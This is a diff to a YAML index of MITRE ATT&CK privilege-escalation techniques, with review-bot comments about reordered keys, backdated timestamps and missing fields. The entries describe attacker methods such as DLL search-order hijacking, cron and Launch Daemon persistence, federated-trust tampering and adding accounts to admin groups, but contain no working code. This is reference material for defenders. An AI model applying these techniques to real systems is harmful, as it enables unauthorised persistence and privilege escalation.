- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16100,8 +16361,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16132,12 +16393,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16209,9 +16471,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16227,12 +16489,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16307,12 +16568,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16332,9 +16592,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16354,9 +16619,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -16373,6 +16637,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16406,7 +16674,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16562,31 +16829,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16603,6 +16850,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16613,9 +16861,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16623,13 +16875,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
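Review bot: most of the T1053.003 churn in this hunk is key reordering rather than content change: `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` are re-added here with exactly the values that were deleted from the top of the same block in the earlier hunk. The substantive changes are only the `modified` bump to 2024-10-15, `x_mitre_version` 1.1 → 1.2, the new `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false` keys, and `x_mitre_attack_spec_version` 2.1.0 → 3.2.0. Emitting keys in a fixed order from the generator (sorted, or the order of the source STIX object) would keep future regenerations reviewable.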
@@ -16659,6 +16927,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16669,6 +16938,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16677,13 +16947,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16725,9 +16995,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16795,19 +17062,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16823,8 +17089,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16838,7 +17104,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16864,6 +17130,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
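Review bot: the new `Hexacorn DLL Hijacking` reference correctly backs the `(Citation: Hexacorn DLL Hijacking)` tag inserted into the T1574.001 description earlier in this diff, and the curly apostrophe in "ol’" is safe in an unquoted YAML scalar. The neighbouring `Microsoft Security Advisory 2269637` entry still has an empty year in "Microsoft. (, May 23)"; that is untouched upstream data rather than something this change introduces, but it is worth reporting to the ATT&CK maintainers.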
@@ -16891,12 +17161,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16922,7 +17191,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16964,7 +17233,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17042,11 +17310,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17126,7 +17393,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
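Review bot: the new T1098.007 block ends with `atomic_tests: []` but has no `identifier: T1098.007` line, whereas most neighbouring entries (T1053.003, T1098.003, T1574.001, T1547.010, T1055.003) carry `identifier` immediately before `atomic_tests`. A few existing entries (T1574.014, T1098.006, T1053) also lack it, so this may be a generator inconsistency rather than a slip in this commit; either way, if anything keys on `identifier`, add it here, and if not, document that the key is optional.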
@@ -17149,7 +17486,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
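Review bot: the `modified` timestamp for T1055.003 moves backwards here, from 2022-04-25T14:00:00.188Z to 2021-10-18T12:22:50.800Z, which a regeneration from a newer ATT&CK release should not produce. The same regression appears further down for T1546.011 (2022-04-25 → 2020-11-10), T1037.002 (2022-05-11 → 2022-04-20), T1055 (2023-05-09 → 2023-03-30), T1547.005 (2021-04-29 → 2020-03-25), T1543.004 (2023-05-09 → 2023-03-30), T1546.005 (2021-04-29 → 2020-03-24), T1574.006 (2023-05-09 → 2023-03-30) and T1134.002 (2023-05-09 → 2023-04-11). Please confirm which STIX bundle the generator was run against and whether these objects were picked up from an older copy; if the upstream data really changed, record the source release in the PR description.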
@@ -17197,8 +17534,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
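Review bot: T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with no replacement, whereas T1053.003 and T1547.009 in this diff have their 2.1.0 value replaced by `x_mitre_attack_spec_version: 3.2.0`. The same unreplaced removal happens for T1546.011, T1547.005 and T1546.005 below. Objects that carry no `x_mitre_attack_spec_version` at all look like pre-2.1.0 versions of the technique, which matches the older `modified` dates these entries receive; please check the source data before merging rather than accepting the field loss.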
@@ -17230,7 +17565,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17285,13 +17620,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17352,9 +17685,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17363,7 +17696,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17416,7 +17748,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17437,12 +17769,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17545,7 +17876,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17645,12 +17975,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17663,7 +17992,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17676,7 +18004,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17706,7 +18033,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17733,7 +18061,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17759,13 +18087,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17842,12 +18168,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17866,6 +18191,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
